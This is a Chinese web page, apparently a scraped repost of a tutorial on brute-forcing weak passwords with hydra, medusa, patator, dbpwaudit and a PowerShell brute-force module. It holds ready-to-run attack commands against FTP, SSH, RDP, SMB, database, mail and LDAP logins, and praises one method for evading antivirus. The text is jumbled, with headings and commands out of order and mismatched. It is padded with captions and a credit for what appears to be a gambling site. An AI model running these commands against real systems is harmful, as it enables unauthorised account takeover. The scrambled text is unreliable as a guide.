永不消失的,Hydra初级破解工具
分类:科学技术

-4/-6 4表示用ipv4,6表示用ipv6

ftp:

hydra ip ftp -L 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

 

尝试爆破ssh [速度一般]:

3389远程爆破 rdp协议

hydra 192.168.20.110 rdp -L user.txt -P pass.txt -V 

其中命令: 192.168.20.87 是目标ip

Rdp是协议

-L 是指定一个字典

-P 指定密码

-V 显示爆破详细过程

 

爆破svn [实际中多次测试均未跑出来]:

Hydra初级破解工具

 帮助命令:hydra -h  //查看基本用法

爆破ftp [还算靠谱,不过需要前期好好搜集下目标的用户名]:

爆破过程:

爆破telnet [还有问题]:

参数说明:

hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w time] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} 
http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener 
postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。

 

# dbpwaudit -s 192.168.3.23 -p 1433 -D Mssql -d master -U user.txt -P weak.txt

Ssh 协议:

hydra -L user.txt  -P pass.txt  192.168.1.2 ssh

 

 

爆破ldap2/3(同样跑不出来):

# powershell –exec bypass –Command "& {Import-Module 'C:Invoke-BruteForce.ps1';Invoke-BruteForce -ComputerName 2008R2DC -UserList C:user.txt -PasswordList C:pass.txt -Service SQL -Verbose}"

威尼斯国际平台app 1

威尼斯国际平台app 2

# mkdir build

爆破ssh [速度一般,不过精度还可以]:

# powershell –exec bypass –Command "& {Import-Module 'C:Invoke-BruteForce.ps1';Invoke-BruteForce -ComputerName rootkit.org -UserList C:user.txt -PasswordList C:pass.txt -Service ActiveDirectory -Verbose}"

0x05 针对各类服务的实例爆破演示:

爆破smb [速度还是比较快的,针对普通域内网的效果可能会好点]:

这里暂以linux平台使用为例,实际测试中也推荐大家在linux平台上自己编译,不然有些服务模块可能不太好使,虽然已经有编译好的win版本,但不太建议实际用,如果真没办法非要在win上跑,建议大家还是用7.x之前的版本吧,新版本中确实还有很多问题

-e 尝试空密码[n]/尝试将用户名作为密码[s]/尝试将用户名和密码位置调换爆破[r]

爆破vnc [现在基本是没什么人用了,实际中遇到的也不太多,大多都换成了teamviewer]:

/usr/share/dbpwaudit/lib

支持的服务比较多,这里就不一一演示了,大家可根据实际情况针对性的用,就个人使用来讲,hydra精度真的很一般 [尤其是在爆破各类邮件服务时,比如,pop3,smtp[这个还好点儿] ,imap,时好时坏,极不稳定,原因暂未找],速度也极为一般,单单就稳定性来讲,不是很靠谱,不过这里仅供参考,建议大家还是根据自己的实际情况来,一面之词,不足为信,大家可以自己实际使用为准

-e n/s跟hydra一样,尝试空密码,把用户名当密码尝试,

# medusa -h 192.168.3.23 -u target_name@target.org -P pass.txt -f -M pop3

尝试爆破smb [速度还算可以]:

安装好第三方py库

# pip install impacket 网络库一样经常报错

-f/-F 当爆出第一个正确的密码后,就自动退出程序,-f表示单个'进程'退出,-F表示全局退出

# hydra -L user.txt -P pass.txt -f -v -t 20 smb://192.168.3.23

# hydra -L user.txt -P pass.txt -f -v -t 20 rdp://192.168.3.23

0x11 patator使用小结:

# cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..

# cd medusa-2.2# vi INSTALL

# dbpwaudit -s 192.168.3.23 -p 3306 -D Mysql -d mysql -U user.txt -P weak.txt

0x14 利用 burpsuite 爆破各类登陆表单

威尼斯国际平台app 3

-s 如果要爆破的服务用的不是默认端口,可以用这个来手工指定服务端口号

/usr/local/lib/medusa/modules

爆破ssh [正常情况下的速度还可以,前面装libssh就是为了爆破它的]:

爆破mysql [暂只支持mysql 5.1以下]

# medusa -h

威尼斯国际平台app 4

# hydra -L user.txt -P pass.txt -v -f -t 20 smtp://192.168.3.160

0x01 hydra 选项用途简要说明

# ./configure && make && make install

/usr/lib/medusa/modules

# medusa -h 192.168.3.23 -U user.txt -P pass.txt -f -M ftp

威尼斯国际平台app 5

# hydra -L user.txt -P pass.txt -f -v -t 20 ldap2://192.168.3.161

0x13 使用 dbpwAudit [一款专门针对各类数据库的爆破工具一款专门针对各类数据库的爆破工具,优势在于利用驱动跑,速度非常快]

支持爆破的服务模块,在kali中的默认路径如下:

# cd hydra-8.0

基于py2.7 ,可定制度高,实际中你也可以选择用pywin32之类的东西把它打包成exe,某些服务模块貌似只能在linux中运行[也可能是由于我自己的系统原因吧],另外,其它的问题也非常多,极不建议在实战中使用,拿来作为样本学习还是可以的:

爆破ftp:

# medusa -h 192.168.3.13 -U user.txt -P pass.txt -f -M mysql

威尼斯国际平台app 6

爆破pop3[不需要域名后缀,只需正确的账号密码即可,同样,很不稳定,有兴趣,可以拿常用公共邮箱测测精度,如:gmail,outlook,126,163,sina,qq…]:

# medusa -h 192.168.3.11 -u root -P pass.txt -f -M ssh

# hydra -L user.txt -P pass.txt -v -f -t 20 smtp://192.168.3.160

# echo $?

-M 把要爆破的目标都写到一个文件中,每行对应一个目标,支持域名,CIDR格式,或者单个ip的形式

务必事先安装好所需的各种依赖库,因为hydra在破解各种服务的时候,可能会用到各类服务自己devel库中的一些函数,也就意味着你可能要装很多个库,因为它本身就支持很多服务的在线爆破,其实,就这一点来说,hydra本身做的事情并不算多,因为大多都要依赖别的库函数来实现,这样来看的话,hydra本质上只是把各种服务整合了一下

威尼斯国际平台app 7

-R 从上次未完成的爆破文件[hydra.restore]中读取爆破进度并接着上次的进度继续往后爆破

-v 显示爆破信息

# python patator.py ftp_login host=192.168.3.23 port=21 user=FILE0 password=FILE1 0=user.txt 1=pass.txt

可以看到就hydra 本身的编译安装过程倒是非常简单,你也可以用–prefix指定安装目录,走的时候方便顺手把整个安装目录干掉即可

# pip install paramiko

# powershell –exec bypass –Command "& {Import-Module 'C:Invoke-BruteForce.ps1';Invoke-BruteForce -ComputerName 2008R2DC -UserList C:user.txt -PasswordList C:pass.txt -Service Ftp -Verbose}"

-n 如果服务不是默认的端口,用该选项手工指定端口号

威尼斯国际平台app 8

0x12 如果是直接处在目标域内网中,直接用powershell来爆破,无疑是极好的,优点,免杀效果好,小巧,灵活,定制度高,win平台首选,缺点,速度稍慢:

-f 在爆出第一个密码之后就退出该程序

0x04 编译安装hydra

爆破mssql [大多可能都是直接针对sa,想快速getshell,实际测试速度和精度都还不错]:

威尼斯国际平台app 9

爆破telnet [靠谱]:

关于不同系统平台所要安装的一些依赖库,在工具官方站点中已有详细说明,链接如下,请自行查看

下面中的有一些库,有可能在你的环境中直接用yum装不上,没办法了,只能你自己稍微勤快点,去谷歌上找找,然后再单独手工把它装上,放心,肯定能找到解决办法的,如果中间有库装不上,可能在编译hydra时确实是可以编译成功,但等到后期实际爆破某些服务的时候就会出现各种问题

# hydra -L user.txt -P pass.txt -f -v -t 20 ftp://192.168.3.23

责任编辑:

爆破postgresql [实际测试中,速度还是蛮快的咧]:

威尼斯国际平台app 10

0x06 常用选项功能说明,跟hydra选项用法基本一致,看看命令帮助就知道了,这儿不再细说:

# yum groupinstall "Development Tools"

原标题:永不消失的 '0day' [ 弱口令 ]

爆破postgresql [速度非常快]:

爆破mssql [同样是只针对sa]:

# python patator.py ssh_login host=192.168.3.11 port=22 user=FILE0 password=FILE1 0=user.txt 1=pass.txt

# hydra -l root -P pass.txt -f -v -t 20 mysql://192.168.3.13

威尼斯国际平台app 11

威尼斯国际平台app ,0x03 安装 hydra 的各种依赖库

爆破rlogin [暂时还有些问题]:

0x10 下面是实际爆破成功的一些服务

# hydra -L user.txt -P pass.txt -f -v -t 20 svn://192.168.3.13

本文由威尼斯网址开户网站发布于科学技术,转载请注明出处:永不消失的,Hydra初级破解工具

上一篇:没有了 下一篇:没有了
猜你喜欢
热门排行
精彩图文